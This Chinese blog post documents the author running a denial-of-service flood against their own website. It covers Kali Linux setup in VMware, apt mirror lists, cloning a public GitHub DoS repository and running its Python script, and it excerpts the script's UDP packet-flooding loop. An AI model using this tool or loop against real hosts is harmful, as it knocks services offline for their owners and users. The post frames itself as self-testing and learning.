对自己的博客网站进行DOS攻击(脚本小子□_□)

先说明一点,别对别人的网站进行ddos/dos攻击(dos攻击一般短时间攻击不下来),这是违法的,很多都有自动报警机制,本篇博客仅用于学习,请勿用于非法用途

安装kaili Linux

进入KALI官网,下载iso镜像文件

avatar

vmware新建虚拟机,选择自定义
avatar

点击下一步

avatar

点击下一步
avatar
选择稍后安装操作系统,点击下一步
avatar
选择Debian系统,版本根据自己的kali版本来,我这里就选最新的Debian12,点击下一步
avatar
虚拟机名称和存储位置根据自己情况来,点击下一步
avatar
处理器配置根据自己电脑的配置来,点击下一步
avatar
内存也是根据自己的使用情况来,点击下一步
avatar
点击下一步
avatar
点击下一步
avatar
点击下一步
avatar
点击下一步
avatar
点击下一步
avatar
点击下一步
avatar
点击自定义硬件
avatar
导入下载好的ISO文件,关闭后点击完成即可

剩下启动后的配置就比较简单了,根据自己情况来即可

安装完成后打开是这样的:
avatar

换源+更新

avatar

进入root权限

1
sudo su

输入密码后,换源

1
sudo vim /etc/apt/sources.list

部分国内源:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
官方源
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib
中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
清华大学
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
浙大
deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
东软大学
deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
重庆大学
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib

自己选一个换上就行,然后进行更新:

1
sudo apt-get update

DOS攻击

未被攻击前访问我的网站是这样的:

avatar

avatar

下载Dos脚本

1
git clone https://github.com/Andysun06/ddos

avatar

进入ddos文件夹

1
cd ddos

执行python脚本

1
python ddos-p3.py

反正我攻击了大概8分钟,网站还是可以正常访问的,由于阿里云服务器有一定量的免费的cdn防护,我个人进行DOS攻击至少需要一小时才能耗完.这次只是实验一下,所以就不继续了.

avatar
我们可以看到受到攻击后服务器的带宽是有被大量消耗的,说明我们的攻击是有效的.

代码分析

去作者的github上把代码拉下来,看看是怎么写的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
os.system("clear")
os.system("figlet DDos Attack")
ip = input("请输入 IP : ")
port = int(input("攻击端口 : "))
sd = int(input("攻击速度(1~1000) : "))

os.system("clear")

sent = 0
while True:
sock.sendto(bytes, (ip,port))
sent = sent + 1
print ("已发送 %s 个数据包到 %s 端口 %d"%(sent,ip,port))
time.sleep((1000-sd)/2000)

核心代码就这么几行,其实就是不断向指定IP的端口发送数据包,然后打印发送数据包的个数.